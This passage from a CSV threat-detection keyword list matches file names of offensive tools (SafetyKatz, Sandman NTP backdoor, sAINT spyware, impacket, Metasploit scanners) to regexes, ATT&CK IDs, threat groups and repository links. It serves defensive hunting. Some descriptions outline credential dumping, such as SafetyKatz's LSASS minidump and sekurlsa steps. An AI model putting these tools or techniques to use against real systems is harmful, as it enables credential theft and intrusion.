Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","10662" "*/Safer_PoC_CVE*",".{0,1000}\/Safer_PoC_CVE.{0,1000}","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","N/A","1","44","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z","10663" "*/SafetyDump.exe*",".{0,1000}\/SafetyDump\.exe.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","1","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","10664" "*/SafetyDump.git*",".{0,1000}\/SafetyDump\.git.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","1","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","10665" "*/SafetyKatz.dll*",".{0,1000}\/SafetyKatz\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","10666" "*/SafetyKatz.dll*",".{0,1000}\/SafetyKatz\.dll.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","10667" "*/SafetyKatz.exe*",".{0,1000}\/SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10668" "*/SafetyKatz.exe*",".{0,1000}\/SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10669" "*/SafetyKatz.exe*",".{0,1000}\/SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10670" "*/SafetyKatz.git*",".{0,1000}\/SafetyKatz\.git.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. 
removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","10671" "*/sAINT.git*",".{0,1000}\/sAINT\.git.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","10672" "*/sAINT-master.zip*",".{0,1000}\/sAINT\-master\.zip.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","10673" "*/Sako RAT.exe*",".{0,1000}\/Sako\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10674" "*/sam_dump_*.txt*",".{0,1000}\/sam_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","10675" "*/sambaPipe.py*",".{0,1000}\/sambaPipe\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10676" "*/samba-vuln-cve-2012-1182.nse*",".{0,1000}\/samba\-vuln\-cve\-2012\-1182\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10677" "*/samdump.go*",".{0,1000}\/samdump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","10678" "*/samdump2*",".{0,1000}\/samdump2.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","Black Basta","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","N/A","10","6","N/A","N/A","N/A","N/A","10679" "*/sampasswd*",".{0,1000}\/sampasswd.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10680" "*/samrdump.exe*",".{0,1000}\/samrdump\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10681" "*/samrdump.py*",".{0,1000}\/samrdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10682" "*/samruser.py*",".{0,1000}\/samruser\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","10683" "*/samusrgrp.*",".{0,1000}\/samusrgrp\..{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10684" "*/sandcat.git*",".{0,1000}\/sandcat\.git.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","N/A","6","6","525","72","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z","10685" "*/Sandman.exe*",".{0,1000}\/Sandman\.exe.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","1","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","10686" "*/sandman_server.py*",".{0,1000}\/sandman_server\.py.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - 
TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","1","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","10687" "*/SandmanBackdoorTimeProvider.dll*",".{0,1000}\/SandmanBackdoorTimeProvider\.dll.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","1","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","10688" "*/Sandman-master.zip*",".{0,1000}\/Sandman\-master\.zip.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","1","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","10689" "*/sap_default.txt*",".{0,1000}\/sap_default\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10690" "*/SauronEye.exe*",".{0,1000}\/SauronEye\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10691" "*/SauronEye.exe*",".{0,1000}\/SauronEye\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10692" "*/saycheese.html*",".{0,1000}\/saycheese\.html.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","1","N/A","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","10693" "*/saycheese.sh*",".{0,1000}\/saycheese\.sh.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","1","N/A","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","10694" "*/sbin/chntpw*",".{0,1000}\/sbin\/chntpw.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10695" "*/sbin/sampasswd*",".{0,1000}\/sbin\/sampasswd.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential 
Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10697" "*/sbin/samunlock*",".{0,1000}\/sbin\/samunlock.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10698" "*/sbin/samusrgrp*",".{0,1000}\/sbin\/samusrgrp.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10699" "*/sc_inject/inject/*",".{0,1000}\/sc_inject\/inject\/.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","10700" "*/scan4all.exe*",".{0,1000}\/scan4all\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","10701" "*/scan4all.git*",".{0,1000}\/scan4all\.git.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","10702" "*/scan4all.git*",".{0,1000}\/scan4all\.git.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application 
password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","10703" "*/scan4all.rb*",".{0,1000}\/scan4all\.rb.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","10704" "*/scan4all/lib/api*",".{0,1000}\/scan4all\/lib\/api.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","10705" "*/scan4all/lib/util*",".{0,1000}\/scan4all\/lib\/util.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","10706" "*/ScanInterception.ps1*",".{0,1000}\/ScanInterception\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration 
tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","10707" "*/scanner/discovery*",".{0,1000}\/scanner\/discovery.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10708" "*/scanner/kerberos*",".{0,1000}\/scanner\/kerberos.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10709" "*/scanner/pcanywhere*",".{0,1000}\/scanner\/pcanywhere.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10710" "*/scanner/portscan*",".{0,1000}\/scanner\/portscan.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10711" "*/scanner/winrm*",".{0,1000}\/scanner\/winrm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10712" "*/scannerPort.go*",".{0,1000}\/scannerPort\.go.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Discovery","https://github.com/luijait/GONET-Scanner","1","1","N/A","network exploitation tool","N/A","1","82","21","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z","10713" 